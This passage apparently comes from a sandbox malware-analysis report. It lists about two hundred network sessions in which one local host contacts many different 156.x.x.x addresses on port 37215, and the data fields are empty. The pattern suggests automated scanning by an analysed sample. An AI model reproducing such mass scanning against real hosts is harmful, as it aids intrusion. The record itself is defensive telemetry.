                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5296192.168.2.1559024156.29.218.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5297192.168.2.1541332156.40.100.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5298192.168.2.1550492156.115.123.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5299192.168.2.1539540156.127.38.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5300192.168.2.1556454156.93.198.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5301192.168.2.1543166156.145.231.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5302192.168.2.1536532156.43.129.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5303192.168.2.1558510156.156.71.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5304192.168.2.1538058156.84.111.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5305192.168.2.1556484156.150.144.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5306192.168.2.1551598156.153.71.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5307192.168.2.1559354156.70.58.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5308192.168.2.1559634156.19.170.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5309192.168.2.1549388156.32.113.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5310192.168.2.1555234156.208.218.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5311192.168.2.1557172156.218.200.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5312192.168.2.1556882156.219.211.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5313192.168.2.1545570156.135.18.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5314192.168.2.1544980156.9.253.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5315192.168.2.1535420156.175.25.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5316192.168.2.1546138156.186.91.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5317192.168.2.1536324156.219.1.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5318192.168.2.1558288156.107.109.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5319192.168.2.1540532156.34.153.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5320192.168.2.1533946156.42.34.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5321192.168.2.1533734156.164.100.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5322192.168.2.1545578156.46.13.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5323192.168.2.1548610156.173.30.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5324192.168.2.1554358156.197.66.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5325192.168.2.1548190156.209.137.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5326192.168.2.1550476156.221.230.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5327192.168.2.1553916156.158.139.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5328192.168.2.1556378156.148.148.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5329192.168.2.1540504156.58.249.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5330192.168.2.1555920156.85.58.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5331192.168.2.1540776156.37.134.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5332192.168.2.1555238156.18.245.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5333192.168.2.1555042156.204.87.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5334192.168.2.1551686156.167.202.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5335192.168.2.1540046156.173.157.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5336192.168.2.1539926156.70.3.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5337192.168.2.1544992156.9.21.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5338192.168.2.1551162156.248.249.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5339192.168.2.1560502156.158.195.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5340192.168.2.1555028156.57.92.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5341192.168.2.1545416156.79.254.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5342192.168.2.1534060156.163.110.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5343192.168.2.1560174156.200.185.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5344192.168.2.1542368156.67.198.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5345192.168.2.1539898156.18.145.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5346192.168.2.1535824156.135.18.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5347192.168.2.1543804156.138.138.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5348192.168.2.1536274156.230.208.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5349192.168.2.1556204156.129.33.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5350192.168.2.1549502156.55.111.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5351192.168.2.1556074156.205.193.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5352192.168.2.1548484156.90.215.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5353192.168.2.1534480156.64.157.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5354192.168.2.1545816156.255.155.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5355192.168.2.1548146156.159.85.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5356192.168.2.1552796156.24.95.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5357192.168.2.1554768156.222.117.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5358192.168.2.1553862156.162.143.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5359192.168.2.1556640156.84.57.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5360192.168.2.1542002156.40.89.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5361192.168.2.1533062156.147.224.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5362192.168.2.1533086156.126.146.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5363192.168.2.1540604156.21.82.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5364192.168.2.1538732156.66.85.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5365192.168.2.1551690156.82.5.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5366192.168.2.1560692156.134.239.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5367192.168.2.1550532156.81.60.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5368192.168.2.1552394156.4.114.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5369192.168.2.1555966156.98.157.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5370192.168.2.1556234156.220.202.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5371192.168.2.1542164156.135.232.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5372192.168.2.1546826156.12.54.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5373192.168.2.1542346156.82.202.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5374192.168.2.1557548156.145.182.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5375192.168.2.1555282156.173.187.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5376192.168.2.1540592156.225.126.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5377192.168.2.1535284156.130.182.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5378192.168.2.1560440156.54.77.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5379192.168.2.1538660156.93.31.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5380192.168.2.1556620156.39.81.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5381192.168.2.1554716156.97.139.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5382192.168.2.1538726156.114.150.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5383192.168.2.1532790156.87.194.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5384192.168.2.1536568156.98.37.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5385192.168.2.1538334156.126.9.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5386192.168.2.1536538156.36.92.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5387192.168.2.1534348156.108.169.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5388192.168.2.1542574156.194.62.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5389192.168.2.1536324156.191.39.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5390192.168.2.1532816156.69.47.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5391192.168.2.1554040156.90.182.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5392192.168.2.1544564156.153.76.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5393192.168.2.1544352156.192.244.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5394192.168.2.1542222156.8.57.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5395192.168.2.1536852156.56.220.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5396192.168.2.1551364156.101.42.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5397192.168.2.1543360156.3.68.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5398192.168.2.1554112156.1.174.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5399192.168.2.1545190156.15.9.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5400192.168.2.1543726156.111.95.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5401192.168.2.1541686156.206.68.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5402192.168.2.1544362156.153.92.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5403192.168.2.1545834156.3.113.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5404192.168.2.1557116156.135.85.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5405192.168.2.1539192156.236.147.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5406192.168.2.1556044156.33.59.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5407192.168.2.1535040156.2.59.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5408192.168.2.1558044156.194.168.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5409192.168.2.1542728156.168.33.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5410192.168.2.1540016156.103.169.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5411192.168.2.1539728156.44.31.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5412192.168.2.1557934156.37.207.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5413192.168.2.1550320156.245.133.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5414192.168.2.1534604156.194.96.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5415192.168.2.1557974156.63.51.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5416192.168.2.1537376156.176.122.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5417192.168.2.1558210156.145.165.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5418192.168.2.1541212156.81.77.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5419192.168.2.1540906156.93.115.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5420192.168.2.1538926156.246.68.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5421192.168.2.1557254156.217.254.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5422192.168.2.1551642156.97.233.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5423192.168.2.1549154156.117.27.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5424192.168.2.1544844156.84.0.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5425192.168.2.1536956156.229.134.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5426192.168.2.1546718156.85.36.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5427192.168.2.1545900156.12.201.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5428192.168.2.1556494156.100.40.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5429192.168.2.1541576156.5.208.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5430192.168.2.1554762156.164.6.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5431192.168.2.1559674156.142.64.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5432192.168.2.1548598156.56.43.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5433192.168.2.1548580156.130.12.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5434192.168.2.1543586156.129.189.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5435192.168.2.1544206156.134.40.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5436192.168.2.1552874156.120.237.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5437192.168.2.1560310156.254.36.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5438192.168.2.1557932156.143.136.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5439192.168.2.1555618156.172.122.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5440192.168.2.1548214156.222.72.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5441192.168.2.1551820156.94.92.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5442192.168.2.1544500156.26.45.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5443192.168.2.1549154156.163.37.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5444192.168.2.1560048156.67.164.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5445192.168.2.1536958156.29.184.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5446192.168.2.1541376156.182.96.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5447192.168.2.1557336156.250.107.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5448192.168.2.1548560156.87.43.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5449192.168.2.1540306156.81.85.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5450192.168.2.1548754156.121.36.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5451192.168.2.1542078156.108.227.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5452192.168.2.1560642156.255.100.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5453192.168.2.1548240156.214.79.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5454192.168.2.1550520156.46.91.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5455192.168.2.1560346156.192.177.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5456192.168.2.1535184156.95.132.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5457192.168.2.1541408156.244.117.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5458192.168.2.1557930156.36.215.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5459192.168.2.1542394156.245.188.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5460192.168.2.1533076156.202.156.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5461192.168.2.1537126156.160.147.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5462192.168.2.1557726156.107.223.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5463192.168.2.1540364156.110.64.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5464192.168.2.1548092156.255.234.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5465192.168.2.1546202156.174.206.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5466192.168.2.1544034156.68.91.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5467192.168.2.1538022156.232.42.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5468192.168.2.1542366156.206.250.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5469192.168.2.1553278156.55.3.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5470192.168.2.1541412156.65.83.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5471192.168.2.1538954156.45.84.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5472192.168.2.1555492156.133.220.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5473192.168.2.1559048156.191.233.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5474192.168.2.1536718156.8.4.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5475192.168.2.1536972156.169.147.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5476192.168.2.1552102156.250.246.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5477192.168.2.1558144156.97.123.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5478192.168.2.1534270156.45.17.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5479192.168.2.1536242156.29.180.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5480192.168.2.1539164156.35.11.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5481192.168.2.1544310156.61.197.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5482192.168.2.1554332156.36.193.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5483192.168.2.1547072156.118.127.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5484192.168.2.1551714156.215.106.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5485192.168.2.1533254156.9.101.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5486192.168.2.1559186156.157.10.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5487192.168.2.1544058156.217.27.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5488192.168.2.1534056156.37.188.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5489192.168.2.1560062156.65.148.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5490192.168.2.1537960156.232.142.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5491192.168.2.1540060156.90.188.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5492192.168.2.1535564156.99.179.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5493192.168.2.1549372156.61.162.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5494192.168.2.1534472156.35.16.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5495192.168.2.1546798156.56.98.14137215
